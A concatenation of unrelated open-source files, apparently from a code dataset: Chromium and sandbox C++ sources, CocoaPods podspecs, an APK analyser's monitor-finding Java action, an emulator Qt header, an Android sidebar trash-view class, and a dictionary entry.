is_hyphenated) const; unsigned Hyphenate(unsigned offset, unsigned start, bool backwards, bool* is_hyphenated) const; unsigned Hyphenate(unsigned offset, unsigned word_start, unsigned word_end, bool backwards) const; scoped_refptr<ShapeResult> Shape(TextDirection, unsigned start, unsigned end); scoped_refptr<ShapeResult> ShapeToEnd(unsigned start, unsigned first_safe, unsigned range_end); const HarfBuzzShaper* shaper_; const Font* font_; const ShapeResult* result_; const LazyLineBreakIterator* break_iterator_; // TODO(kojii): ShapeResultSpacing is not const because it's stateful when it // has expansions. Split spacing and expansions to make this const. ShapeResultSpacing<String>* spacing_; const Hyphenation* hyphenation_; bool is_soft_hyphen_enabled_; friend class ShapingLineBreakerTest; }; } // namespace blink #endif // THIRD_PARTY_BLINK_RENDERER_PLATFORM_FONTS_SHAPING_SHAPING_LINE_BREAKER_H_
1,907
575
<filename>content/browser/background_sync/background_sync_registration_helper.cc // Copyright 2019 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "content/browser/background_sync/background_sync_registration_helper.h" #include "base/memory/weak_ptr.h" #include "content/browser/background_sync/background_sync_context_impl.h" #include "content/browser/background_sync/background_sync_manager.h" #include "content/browser/background_sync/background_sync_status.h" #include "content/public/browser/browser_thread.h" namespace content { BackgroundSyncRegistrationHelper::BackgroundSyncRegistrationHelper( BackgroundSyncContextImpl* background_sync_context) : background_sync_context_(background_sync_context) { DCHECK(background_sync_context_); } BackgroundSyncRegistrationHelper::~BackgroundSyncRegistrationHelper() = default; void BackgroundSyncRegistrationHelper::Register( blink::mojom::SyncRegistrationOptionsPtr options, int64_t sw_registration_id, RegisterCallback callback) { DCHECK_CURRENTLY_ON(ServiceWorkerContext::GetCoreThreadId()); BackgroundSyncManager* background_sync_manager = background_sync_context_->background_sync_manager(); DCHECK(background_sync_manager); background_sync_manager->Register( sw_registration_id, *options, base::BindOnce(&BackgroundSyncRegistrationHelper::OnRegisterResult, weak_ptr_factory_.GetWeakPtr(), std::move(callback))); } void BackgroundSyncRegistrationHelper::DidResolveRegistration( blink::mojom::BackgroundSyncRegistrationInfoPtr registration_info) { DCHECK_CURRENTLY_ON(ServiceWorkerContext::GetCoreThreadId()); BackgroundSyncManager* background_sync_manager = background_sync_context_->background_sync_manager(); DCHECK(background_sync_manager); background_sync_manager->DidResolveRegistration(std::move(registration_info)); } void BackgroundSyncRegistrationHelper::OnRegisterResult( RegisterCallback callback, BackgroundSyncStatus status, std::unique_ptr<BackgroundSyncRegistration> result) { DCHECK_CURRENTLY_ON(ServiceWorkerContext::GetCoreThreadId()); // TODO(crbug.com/932591): Use blink::mojom::BackgroundSyncError // directly. if (status != BACKGROUND_SYNC_STATUS_OK) { std::move(callback).Run( static_cast<blink::mojom::BackgroundSyncError>(status), /* options= */ nullptr); return; } DCHECK(result); std::move(callback).Run( static_cast<blink::mojom::BackgroundSyncError>(status), result->options()->Clone()); } void BackgroundSyncRegistrationHelper::NotifyInvalidOptionsProvided( RegisterCallback callback) const { mojo::ReportBadMessage( "BackgroundSyncRegistrationHelper: Invalid options passed."); std::move(callback).Run(blink::mojom::BackgroundSyncError::NOT_ALLOWED, /* options= */ nullptr); } void BackgroundSyncRegistrationHelper::OnGetRegistrationsResult( GetRegistrationsCallback callback, BackgroundSyncStatus status, std::vector<std::unique_ptr<BackgroundSyncRegistration>> result_registrations) { DCHECK_CURRENTLY_ON(ServiceWorkerContext::GetCoreThreadId()); std::vector<blink::mojom::SyncRegistrationOptionsPtr> mojo_registrations; mojo_registrations.reserve(result_registrations.size()); for (const auto& registration : result_registrations) mojo_registrations.push_back(registration->options()->Clone()); std::move(callback).Run( static_cast<blink::mojom::BackgroundSyncError>(status), std::move(mojo_registrations)); } base::WeakPtr<BackgroundSyncRegistrationHelper> BackgroundSyncRegistrationHelper::GetWeakPtr() { return weak_ptr_factory_.GetWeakPtr(); } } // namespace content
1,199
6,989
#ifdef USE_PYTHON3 #include <contrib/python/numpy/py3/numpy/f2py/src/fortranobject.h> #else #include <contrib/python/numpy/py2/numpy/f2py/src/fortranobject.h> #endif
77
5,169
<gh_stars>1000+ { "name": "GMJKFunction", "version": "0.6.0", "summary": "国民集团 独立功能集成", "description": "TODO: Add long description of the pod here.", "homepage": "http://119.3.60.230/IOS", "license": { "type": "MIT", "file": "LICENSE" }, "authors": { "满聪": "<EMAIL>" }, "source": { "git": "http://172.16.17.3230/IOS/GMJKFunction.git", "tag": "0.6.0" }, "platforms": { "ios": "8.0" }, "swift_versions": "5.0", "dependencies": { "SnapKit": [ ], "GMJKExtension": [ ] }, "subspecs": [ { "name": "AppStore", "source_files": "GMJKFunction/Classes/AppStore/*.swift" }, { "name": "JKRoute", "source_files": "GMJKFunction/Classes/JKRoute/*.swift" }, { "name": "JKScanViewController", "source_files": "GMJKFunction/Classes/JKScanViewController/*.swift", "dependencies": { "GMJKFunction/JKRoute": [ ] }, "ios": { "resource_bundles": { "JKScanBundle": "GMJKFunction/Assets/Scan/**/*.png" } } }, { "name": "JKTool", "source_files": "GMJKFunction/Classes/JKTool/*.swift" }, { "name": "JKToast", "source_files": "GMJKFunction/Classes/JKToast/*.swift", "ios": { "resource_bundles": { "JKToastBundle": "GMJKFunction/Assets/Toast/**/*.png" } } }, { "name": "JKTimer", "source_files": "GMJKFunction/Classes/JKTimer/*.swift" }, { "name": "JKPickerView", "source_files": "GMJKFunction/Classes/JKPickerView/*.swift", "ios": { "resource_bundles": { "JKPickerViewBundle": "GMJKFunction/Assets/PickerView/**/*" } } }, { "name": "JKPickerImageHelper", "source_files": "GMJKFunction/Classes/PickerImageHelper/**/*", "ios": { "resource_bundles": { "JKPhotoLibraryBundle": "GMJKFunction/Assets/JKPickerImageHelper/**/*.png" } } } ], "swift_version": "5.0" }
1,087
335
{ "word": "Ministerial", "definitions": [ "Relating to a government minister or ministers.", "Relating to a minister of religion.", "Relating to or entrusted with the execution of the law or the commands of a superior." ], "parts-of-speech": "Adjective" }
107
721
/* * Copyright (C) 2012 Sony Mobile Communications AB * * This file is part of ApkAnalyser. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package analyser.gui.actions.lookup; import gui.actions.AbstractCanceableAction; import java.awt.event.ActionEvent; import java.io.IOException; import java.util.ArrayList; import java.util.HashSet; import java.util.Iterator; import java.util.List; import java.util.Set; import java.util.Stack; import javax.swing.Icon; import mereflect.CollaborateClassContext; import mereflect.CorruptBytecodeException; import mereflect.MEClass; import mereflect.MEClassContext; import mereflect.MEMethod; import org.jf.dexlib.Code.Instruction; import org.jf.dexlib.Code.Opcode; import analyser.gui.LineBuilder; import analyser.gui.MainFrame; import analyser.gui.Selection; import analyser.logic.RefMethod; import analyser.logic.Reference; import andreflect.ApkClassContext; import andreflect.DexMethod; public class FindMonitorsAction extends AbstractCanceableAction { private static final long serialVersionUID = 8382352528921219013L; protected static FindMonitorsAction m_inst = null; protected List<ArrayList<StackEntry>> m_result; protected int m_totalInvoks; protected int m_traversedInvoks = 0; public static FindMonitorsAction getInstance(MainFrame mainFrame) { if (m_inst == null) { m_inst = new FindMonitorsAction("Find monitor calls", null); m_inst.setMainFrame(mainFrame); } return m_inst; } protected FindMonitorsAction(String arg0, Icon arg1) { super(arg0, arg1); } @Override public void run(ActionEvent e) throws Throwable { m_result = new ArrayList<ArrayList<StackEntry>>(); Object ref = Selection.getSelectedObject(); if (!(ref instanceof Reference)) { return; } CollaborateClassContext ctx = MainFrame.getInstance().getResolver().getReferenceContext(); m_totalInvoks = ((Reference) ref).getCount() + 1; m_traversedInvoks = 0; traverse(ctx, new HashSet<MEMethod>(), new Stack<StackEntry>(), (Reference) ref); if (isRunning()) { getMainFrame().actionFinished(this); showResult(); } } protected void traverse(MEClassContext ctx, Set<MEMethod> resolved, Stack<StackEntry> callStack, Reference ref) throws Throwable { if (!isRunning()) { return; } if (ref instanceof RefMethod) { m_traversedInvoks += ((RefMethod) ref).getCount(); getMainFrame().actionReportWork(this, 100 * m_traversedInvoks / m_totalInvoks); MEMethod mMethod = ((RefMethod) ref).getMethod(); recurseInvokations(ctx, resolved, callStack, mMethod); } else { Iterator<Reference> i = ref.getChildren().iterator(); while (i.hasNext()) { traverse(ctx, resolved, callStack, i.next()); } } } protected void recurseInvokations(MEClassContext ctx, Set<MEMethod> resolved, Stack<StackEntry> callStack, MEMethod mMethod) throws IOException { if (resolved.contains(mMethod) || !isRunning()) { return; } resolved.add(mMethod); callStack.push(new StackEntry(mMethod)); List<MEMethod.Invokation> invokations = null; Iterator<MEMethod.Invokation> iI = null; if (mMethod.getMEClass().getResource().getContext().isMidlet()) { if (mMethod.getMEClass().getResource().getContext().getContextDescription().equals(ApkClassContext.DESCRIPTION)) { DexMethod method = (DexMethod) mMethod; if ((method.getEncodedMethod().codeItem != null && method.getEncodedMethod().codeItem.getInstructions().length != 0)) { Instruction[] instructions = method.getEncodedMethod().codeItem.getInstructions(); for (int i = 0; i < instructions.length; i++) { Instruction instruction = instructions[i]; Opcode code = instruction.deodexedInstruction.opcode; if (code == Opcode.MONITOR_ENTER) { reportMonitor(new StackEntry(mMethod, instruction.codeAddress), callStack); //System.out.println("[FindMonitorsAction] Found DexMonitor in "+ mMethod.getDescriptor()); } } } } else { try { List<Integer> monitors = mMethod.getBytecode(194); // monitor enter for (int i = 0; i < monitors.size(); i++) { reportMonitor(new StackEntry(mMethod, (monitors.get(i)).intValue()), callStack); } } catch (CorruptBytecodeException cbe) { } } } try { invokations = mMethod.getInvokations(); iI = invokations.iterator(); } catch (CorruptBytecodeException cbe) { } while (isRunning() && iI != null && iI.hasNext()) { MEMethod.Invokation invok = iI.next(); try { MEClass rClass = ctx.getMEClass(invok.invClassname); MEMethod rMethod = rClass.getMethod(invok.invMethodname, invok.invDescriptor); if (rMethod == null) { throw new ClassNotFoundException("Method " + invok.invMethodname + ":" + invok.invDescriptor + " not found in class " + rClass.getName()); } if (rMethod.isSynchronized()) { reportMonitor(new StackEntry(rMethod), callStack); } if (rClass.getResource().getContext().isMidlet()) { recurseInvokations(ctx, resolved, callStack, rMethod); } } catch (ClassNotFoundException e2) { } } callStack.pop(); } protected void reportMonitor(StackEntry call, Stack<StackEntry> callStack) { StackEntry tmp = null; if (call.pcOffset >= 0) { // replace last entry in stack tmp = callStack.pop(); } callStack.push(call); m_result.add(new ArrayList<StackEntry>(callStack)); callStack.pop(); if (call.pcOffset >= 0) { callStack.push(tmp); } } protected void showResult() { LineBuilder lb = new LineBuilder(); lb.newLine(); if (m_result.size() > 0) { for (int i = 0; i < m_result.size(); i++) { ArrayList<StackEntry> stack = m_result.get(i); for (int j = 0; j < stack.size(); j++) { StackEntry te = stack.get(j); lb.append(te.method.getMEClass().getName(), 0x000088); lb.append(':', 0x000000); lb.append(te.method.getFormattedName() + te.method.getDescriptor().replace('/', '.'), 0x008888); if (te.pcOffset >= 0) { lb.append(te.method.getFormattedName() + te.method.getDescriptor().replace('/', '.'), 0x008888); lb.append(" monitorenter @ " + Integer.toHexString(te.pcOffset), 0x880000); } lb.newLine(); } lb.newLine(); } getMainFrame().showText("Monitors search result", lb); getMainFrame().initBottomInfo(); } else { getMainFrame().setBottomInfo("No monitors found"); } } @Override public void handleThrowable(Throwable t) { t.printStackTrace(); getMainFrame().showError("Error resolving monitors", t); } @Override public String getWorkDescription() { return "Resolving monitors"; } class StackEntry { MEMethod method; int pcOffset = -1; public StackEntry(MEMethod m) { method = m; pcOffset = -1; } public StackEntry(MEMethod m, int offset) { method = m; pcOffset = offset; } } }
3,930
416
<filename>webkit/Page.py from .wkutils import Command def reload(): command = Command('Page.reload', {}) return command
42
5,169
<gh_stars>1000+ { "name": "BaiduMapKit", "version": "6.2.0", "summary": "百度地图iOS SDK(CocoaPods百度地图官方库)", "description": "百度地图iOS SDK:百度地图官方CocoaPods.\n百度地图iOS SDK是一套基于iOS 8.0及以上版本设备的应用程序接口,不仅提供展示地图的基本接口,还提供POI检索、路径规划、地图标注、离线地图、步骑行导航等丰富的LBS能力。", "homepage": "http://developer.baidu.com/map/index.php?title=iossdk", "license": { "type": "Copyright", "text": "Copyright (c) 2015 BaiduLBS" }, "authors": { "baidu map sdk": "<EMAIL>" }, "platforms": { "ios": "8.0" }, "source": { "http": "https://lbsyun-baidu.cdn.bcebos.com/iossdk/map/6.2.0/BaiduMapKitV6.2.0.zip" }, "requires_arc": true, "static_framework": true, "frameworks": [ "CoreGraphics", "CoreLocation", "OpenGLES", "QuartzCore", "Security", "SystemConfiguration", "Accelerate" ], "libraries": [ "sqlite3.0", "c++", "z" ], "user_target_xcconfig": { "OTHER_LDFLAGS": [ "-ObjC", "-w" ] }, "default_subspecs": [ "Base", "Map", "Search", "Cloud", "Utils" ], "subspecs": [ { "name": "Base", "ios": { "vendored_frameworks": "BaiduMapKit/BaiduMapAPI_Base.framework", "vendored_libraries": "BaiduMapKit/thirdlibs/*.{a}", "source_files": "BaiduMapKit/BaiduMapAPI_Base.framework/Headers/*.h", "public_header_files": "BaiduMapKit/BaiduMapAPI_Base.framework/Headers/*.h" } }, { "name": "Map", "ios": { "dependencies": { "BaiduMapKit/Base": [ ] }, "resources": "BaiduMapKit/BaiduMapAPI_Map.framework/*.bundle", "vendored_frameworks": "BaiduMapKit/BaiduMapAPI_Map.framework", "source_files": "BaiduMapKit/BaiduMapAPI_Map.framework/Headers/*.h", "public_header_files": "BaiduMapKit/BaiduMapAPI_Map.framework/Headers/*.h" } }, { "name": "Search", "ios": { "dependencies": { "BaiduMapKit/Base": [ ] }, "vendored_frameworks": "BaiduMapKit/BaiduMapAPI_Search.framework", "source_files": "BaiduMapKit/BaiduMapAPI_Search.framework/Headers/*.h", "public_header_files": "BaiduMapKit/BaiduMapAPI_Search.framework/Headers/*.h" } }, { "name": "Cloud", "ios": { "dependencies": { "BaiduMapKit/Base": [ ] }, "vendored_frameworks": "BaiduMapKit/BaiduMapAPI_Cloud.framework", "source_files": "BaiduMapKit/BaiduMapAPI_Cloud.framework/Headers/*.h", "public_header_files": "BaiduMapKit/BaiduMapAPI_Cloud.framework/Headers/*.h" } }, { "name": "Utils", "ios": { "dependencies": { "BaiduMapKit/Base": [ ] }, "vendored_frameworks": "BaiduMapKit/BaiduMapAPI_Utils.framework", "source_files": "BaiduMapKit/BaiduMapAPI_Utils.framework/Headers/*.h", "public_header_files": "BaiduMapKit/BaiduMapAPI_Utils.framework/Headers/*.h" } } ] }
1,702
3,477
// Copyright Microsoft and Project Verona Contributors. // SPDX-License-Identifier: MIT #include "process_sandbox/platform/platform.h" using namespace sandbox::platform; int main(void) { auto sp = SocketPair::create(); int i = 42; SANDBOX_INVARIANT( write(sp.first.fd, &i, sizeof(i)) == sizeof(i), "Write failed"); SANDBOX_INVARIANT( read(sp.second.fd, &i, sizeof(i)) == sizeof(i), "Read failed"); SANDBOX_INVARIANT(i == 42, "Received value {} != 42", i); i = 0x12345678; SANDBOX_INVARIANT( write(sp.second.fd, &i, sizeof(i)) == sizeof(i), "Write failed"); SANDBOX_INVARIANT( read(sp.first.fd, &i, sizeof(i)) == sizeof(i), "Read failed"); SANDBOX_INVARIANT(i == 0x12345678, "i is {:x}, 0x12345678 expected", i); }
299
455
<filename>ios/Classes/CompressListHandler.h // // CompressListHandler.h // flutter_image_compress // // Created by cjl on 2018/9/8. // #import <Foundation/Foundation.h> @interface CompressListHandler : NSObject - (void)handleMethodCall:(FlutterMethodCall *)call result:(FlutterResult)result; @end
105
679
/************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ #ifndef DOM_NODE_HXX #define DOM_NODE_HXX #include <hash_map> #include <libxml/tree.h> #include <sal/types.h> #include <rtl/ref.hxx> #include <rtl/string.hxx> #include <rtl/ustring.hxx> #include <cppuhelper/implbase3.hxx> #include <sax/fastattribs.hxx> #include <com/sun/star/uno/Reference.h> #include <com/sun/star/uno/Sequence.h> #include <com/sun/star/lang/XUnoTunnel.hpp> #include <com/sun/star/xml/dom/XNode.hpp> #include <com/sun/star/xml/dom/XNodeList.hpp> #include <com/sun/star/xml/dom/XNamedNodeMap.hpp> #include <com/sun/star/xml/dom/NodeType.hpp> #include <com/sun/star/xml/dom/events/XEventTarget.hpp> #include <com/sun/star/xml/dom/events/XEvent.hpp> #include <com/sun/star/xml/dom/DOMException.hpp> #include <com/sun/star/xml/sax/XDocumentHandler.hpp> #include <com/sun/star/xml/sax/XFastDocumentHandler.hpp> using ::rtl::OUString; using ::rtl::OString; using namespace sax_fastparser; using namespace com::sun::star::uno; using namespace com::sun::star::xml::sax; using namespace com::sun::star::xml::dom; using namespace com::sun::star::xml::dom::events; using com::sun::star::lang::XUnoTunnel; namespace DOM { struct Context { Context( const Reference< XFastDocumentHandler >& i_xHandler, const Reference< XFastTokenHandler >& i_xTokenHandler ) : maNamespaces( 1, std::vector<Namespace>() ), maNamespaceMap(101), mxAttribList(new FastAttributeList(i_xTokenHandler)), mxCurrentHandler(i_xHandler, UNO_QUERY_THROW), mxDocHandler(i_xHandler), mxTokenHandler(i_xTokenHandler) {} struct Namespace { OString maPrefix; sal_Int32 mnToken; OUString maNamespaceURL; const OString& getPrefix() const { return maPrefix; } }; typedef std::vector< std::vector<Namespace> > NamespaceVectorType; typedef std::hash_map< OUString, sal_Int32, rtl::OUStringHash > NamespaceMapType; /// outer vector: xml context; inner vector: current NS NamespaceVectorType maNamespaces; NamespaceMapType maNamespaceMap; ::rtl::Reference<FastAttributeList> mxAttribList; Reference<XFastContextHandler> mxCurrentHandler; Reference<XFastDocumentHandler> mxDocHandler; Reference<XFastTokenHandler> mxTokenHandler; }; void pushContext(Context& io_rContext); void popContext(Context& io_rContext); sal_Int32 getTokenWithPrefix( const Context& rContext, const sal_Char* xPrefix, const sal_Char* xName ); sal_Int32 getToken( const Context& rContext, const sal_Char* xName ); /// add namespaces on this node to context void addNamespaces(Context& io_rContext, xmlNodePtr pNode); class CDocument; class CNode : public cppu::WeakImplHelper3< XNode, XUnoTunnel, XEventTarget > { friend class CDocument; friend class CElement; friend class CAttributesMap; private: bool m_bUnlinked; /// node has been removed from document protected: NodeType const m_aNodeType; /// libxml node; NB: not const, because invalidate may reset it to 0! xmlNodePtr m_aNodePtr; ::rtl::Reference< CDocument > const m_xDocument; ::osl::Mutex & m_rMutex; // for initialization by classes derived through ImplInheritanceHelper CNode(CDocument const& rDocument, ::osl::Mutex const& rMutex, NodeType const& reNodeType, xmlNodePtr const& rpNode); void invalidate(); void dispatchSubtreeModified(); public: virtual ~CNode(); static CNode * GetImplementation(::com::sun::star::uno::Reference< ::com::sun::star::uno::XInterface> const& xNode); xmlNodePtr GetNodePtr() { return m_aNodePtr; } virtual CDocument & GetOwnerDocument(); // recursively create SAX events virtual void saxify(const Reference< XDocumentHandler >& i_xHandler); // recursively create SAX events virtual void fastSaxify( Context& io_rContext ); // constrains child relationship between nodes based on type virtual bool IsChildTypeAllowed(NodeType const nodeType); // ---- DOM interfaces /** Adds the node newChild to the end of the list of children of this node. */ virtual Reference< XNode > SAL_CALL appendChild(Reference< XNode > const& xNewChild) throw (RuntimeException, DOMException); /** Returns a duplicate of this node, i.e., serves as a generic copy constructor for nodes. */ virtual Reference< XNode > SAL_CALL cloneNode(sal_Bool deep) throw (RuntimeException); /** A NamedNodeMap containing the attributes of this node (if it is an Element) or null otherwise. */ virtual Reference< XNamedNodeMap > SAL_CALL getAttributes() throw (RuntimeException); /** A NodeList that contains all children of this node. */ virtual Reference< XNodeList > SAL_CALL getChildNodes() throw (RuntimeException); /** The first child of this node. */ virtual Reference< XNode > SAL_CALL getFirstChild() throw (RuntimeException); /** The last child of this node. */ virtual Reference< XNode > SAL_CALL getLastChild() throw (RuntimeException); /** Returns the local part of the qualified name of this node. */ virtual OUString SAL_CALL getLocalName() throw (RuntimeException); /** The namespace URI of this node, or null if it is unspecified. */ virtual OUString SAL_CALL getNamespaceURI() throw (RuntimeException); /** The node immediately following this node. */ virtual Reference< XNode > SAL_CALL getNextSibling() throw (RuntimeException); /** The name of this node, depending on its type; see the table above. -- virtual implemented by actual node types */ virtual OUString SAL_CALL getNodeName() throw (RuntimeException); /** A code representing the type of the underlying object, as defined above. */ virtual NodeType SAL_CALL getNodeType() throw (RuntimeException); /** The value of this node, depending on its type; see the table above. -- virtual implemented by actual node types */ virtual OUString SAL_CALL getNodeValue() throw (RuntimeException); /** The Document object associated with this node. */ virtual Reference< XDocument > SAL_CALL getOwnerDocument() throw (RuntimeException); /** The parent of this node. */ virtual Reference< XNode > SAL_CALL getParentNode() throw (RuntimeException); /** The namespace prefix of this node, or null if it is unspecified. */ virtual OUString SAL_CALL getPrefix() throw (RuntimeException); /** The node immediately preceding this node. */ virtual Reference< XNode > SAL_CALL getPreviousSibling() throw (RuntimeException); /** Returns whether this node (if it is an element) has any attributes. */ virtual sal_Bool SAL_CALL hasAttributes() throw (RuntimeException); /** Returns whether this node has any children. */ virtual sal_Bool SAL_CALL hasChildNodes() throw (RuntimeException); /** Inserts the node newChild before the existing child node refChild. */ virtual Reference< XNode > SAL_CALL insertBefore( const Reference< XNode >& newChild, const Reference< XNode >& refChild) throw (RuntimeException, DOMException); /** Tests whether the DOM implementation implements a specific feature and that feature is supported by this node. */ virtual sal_Bool SAL_CALL isSupported(const OUString& feature, const OUString& ver) throw (RuntimeException); /** Puts all Text nodes in the full depth of the sub-tree underneath this Node, including attribute nodes, into a "normal" form where only structure (e.g., elements, comments, processing instructions, CDATA sections, and entity references) separates Text nodes, i.e., there are neither adjacent Text nodes nor empty Text nodes. */ virtual void SAL_CALL normalize() throw (RuntimeException); /** Removes the child node indicated by oldChild from the list of children, and returns it. */ virtual Reference< XNode > SAL_CALL removeChild(const Reference< XNode >& oldChild) throw (RuntimeException, DOMException); /** Replaces the child node oldChild with newChild in the list of children, and returns the oldChild node. */ virtual Reference< XNode > SAL_CALL replaceChild( const Reference< XNode >& newChild, const Reference< XNode >& oldChild) throw (RuntimeException, DOMException); /** The value of this node, depending on its type; see the table above. */ virtual void SAL_CALL setNodeValue(const OUString& nodeValue) throw (RuntimeException, DOMException); /** The namespace prefix of this node, or null if it is unspecified. */ virtual void SAL_CALL setPrefix(const OUString& prefix) throw (RuntimeException, DOMException); // --- XEventTarget virtual void SAL_CALL addEventListener(const OUString& eventType, const Reference< XEventListener >& listener, sal_Bool useCapture) throw (RuntimeException); virtual void SAL_CALL removeEventListener(const OUString& eventType, const Reference< XEventListener >& listener, sal_Bool useCapture) throw (RuntimeException); virtual sal_Bool SAL_CALL dispatchEvent(const Reference< XEvent >& evt) throw(RuntimeException, EventException); // --- XUnoTunnel virtual ::sal_Int64 SAL_CALL getSomething(Sequence< ::sal_Int8 > const& rId) throw (RuntimeException); }; /// eliminate redundant namespace declarations void nscleanup(const xmlNodePtr aNode, const xmlNodePtr aParent); } #endif
4,666
344
<filename>ASM/c/weather.h #ifndef WEATHER_H #define WEATHER_H void override_weather_state(); #endif
41
446
<gh_stars>100-1000 import argparse import requests import json from stix2 import MemoryStore, Filter import random def generate(): """parse the STIX on MITRE/CTI and return a layer dict with techniques with randomized scores""" # import the STIX data from MITRE/CTI stix = requests.get("https://raw.githubusercontent.com/mitre/cti/master/enterprise-attack/enterprise-attack.json").json() ms = MemoryStore(stix_data=stix["objects"]) # get all techniques in STIX techniques = ms.query([ Filter("type", "=", "attack-pattern") ]) # parse techniques into layer format techniques_list = [] for technique in techniques: # skip deprecated and revoked if ("x_mitre_deprecated" in technique and technique["x_mitre_deprecated"]) or ("revoked" in technique and technique["revoked"]): continue techniqueID = technique["external_references"][0]["external_id"] # get the attackID techniques_list.append({ "techniqueID": techniqueID, "score": random.randint(1,100) # random score }) # return the techniques in a layer dict return { "name": "heatmap example", "versions": { "layer": "4.1", "navigator": "4.1" }, "sorting": 3, # descending order of score "description": "An example layer where all techniques have a randomized score", "domain": "enterprise-attack", "techniques": techniques_list, } if __name__ == '__main__': # download data depending on domain parser = argparse.ArgumentParser( description="Generates a layer wherein all techniques have randomized scores from 1-100." ) parser.add_argument("--output", type=str, default="heatmap_layer.json", help="output filepath" ) args = parser.parse_args() # get the layer layer = generate() # write the layerfile with open(args.output, "w") as f: print("writing", args.output) f.write(json.dumps(layer, indent=4))
770
2,706
<gh_stars>1000+ /* Copyright (c) 2013-2015 <NAME> * * This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ #pragma once #include <QColor> #include <QWidget> #include <QVector> namespace QGBA { class Swatch : public QWidget { Q_OBJECT public: Swatch(QWidget* parent = nullptr); void setDimensions(const QSize&); void setSize(int size); public slots: void setColor(int index, uint16_t); void setColor(int index, uint32_t); signals: void indexPressed(int index); protected: void paintEvent(QPaintEvent*) override; void mousePressEvent(QMouseEvent*) override; private: int m_size = 10; QVector<QColor> m_colors; QPixmap m_backing; QSize m_dims; void updateFill(int index); }; }
310
503
package com.smartisanos.sidebar.view; import android.animation.Animator; import android.animation.AnimatorSet; import android.animation.ObjectAnimator; import android.content.Context; import android.content.res.Resources; import android.view.View; import android.widget.ImageView; import com.smartisanos.sidebar.R; import com.smartisanos.sidebar.action.UninstallAction; import com.smartisanos.sidebar.util.Constants; import com.smartisanos.sidebar.util.LOG; import com.smartisanos.sidebar.util.anim.Anim; import com.smartisanos.sidebar.util.anim.AnimInterpolator; import com.smartisanos.sidebar.util.anim.AnimListener; import com.smartisanos.sidebar.util.anim.AnimTimeLine; import com.smartisanos.sidebar.util.anim.Vector3f; import com.smartisanos.sidebar.view.SidebarRootView.DragView; public class Trash { private static final LOG log = LOG.getInstance(Trash.class); private Context mContext; public ImageView mTrashView; public ImageView mTrashForegroundView; public int mTrashWidth; public int mTrashHeight; public int mWindowWidth; public int mWindowHeight; public int mTrashDisplayHeight; public int mTrashFloatUpHeight; public int [] trash_react_area = new int[4]; public int [] trash_uninstall_react_area = new int[4]; public static final int TRASH_HIDE = 1; public static final int TRASH_SHOW = 2; public static final int TRASH_FLOAT = 3; private int mTrashStatus = TRASH_HIDE; private UninstallAction mUninstallAction; public Trash(Context context, ImageView trashView, ImageView trashForegroundView) { mContext = context; mTrashView = trashView; mTrashForegroundView = trashForegroundView; Resources resources = mContext.getResources(); mTrashWidth = resources.getInteger(R.integer.trash_width);; mTrashHeight = resources.getInteger(R.integer.trash_height); mTrashDisplayHeight = resources.getInteger(R.integer.trash_display_height); mTrashFloatUpHeight = resources.getInteger(R.integer.trash_float_up_height); mWindowWidth = Constants.WindowWidth; mWindowHeight = Constants.WindowHeight; } public boolean inTrashReactArea(float x, float y) { if (trash_react_area[0] == 0) { return false; } if (trash_react_area[0] < x && x < trash_react_area[2]) { if (y > trash_react_area[1]) { return true; } } return false; } public boolean inTrashUninstallReactArea(float x, float y) { if (trash_uninstall_react_area[0] == 0) { return false; } if (trash_uninstall_react_area[0] < x && x < trash_uninstall_react_area[2]) { if (y > trash_uninstall_react_area[1]) { return true; } } return false; } public void dragObjectMoveTo(float x, float y) { if (inTrashReactArea(x, y)) { //in trash area trashFloatUpWithAnim(null); } else { //out trash area trashFallDownWithAnim(); } } public void dismissDialog() { if (mUninstallAction != null) { mUninstallAction.dismissDialog(); } } public boolean dragObjectUpOnUp(float x, float y, DragView dragView) { if (!inTrashUninstallReactArea(x, y)) { return false; } //move icon to trash moveIconToTrash(dragView); mUninstallAction = new UninstallAction(mContext, dragView); mUninstallAction.showUninstallDialog(); return true; } public void initTrashView() { mTrashStatus = TRASH_HIDE; mTrashView.setVisibility(View.GONE); int trashViewWidth = mTrashView.getWidth(); if (trashViewWidth == 0) { trashViewWidth = mTrashWidth; } int locX = mWindowWidth / 2 - trashViewWidth / 2; int locY = mWindowHeight; mTrashView.setTranslationX(locX); mTrashView.setTranslationY(locY); mTrashView.setVisibility(View.VISIBLE); trash_react_area = new int[4]; //left-top, right-bottom int left = mWindowWidth / 2 - mTrashWidth / 2; int top = mWindowHeight - mTrashHeight / 2; int right = mWindowWidth / 2 + mTrashWidth / 2; int bottom = mWindowHeight; trash_react_area[0] = left; trash_react_area[1] = top; trash_react_area[2] = right; trash_react_area[3] = bottom; trash_uninstall_react_area[0] = left; trash_uninstall_react_area[1] = mWindowHeight - mTrashHeight; trash_uninstall_react_area[2] = right; trash_uninstall_react_area[3] = bottom; } public void hideTrashView() { if (mTrashView == null) { return; } mTrashView.setVisibility(View.GONE); } private boolean trashAnimRunning = false; public void trashAppearWithAnim() { if (mTrashStatus != TRASH_HIDE) { return; } if (trashAnimRunning) { log.error("trashAppearWithAnim return by trashAppearAnimRunning true"); return; } mTrashView.setTranslationX(mWindowWidth / 2 - mTrashView.getWidth() / 2); int fromY = mWindowHeight; int toY = mWindowHeight - mTrashDisplayHeight; Vector3f from = new Vector3f(0, fromY); Vector3f to = new Vector3f(0, toY); Anim anim = new Anim(mTrashView, Anim.TRANSLATE, 200, Anim.CUBIC_OUT, from, to); anim.setListener(new AnimListener() { @Override public void onStart() { trashAnimRunning = true; int 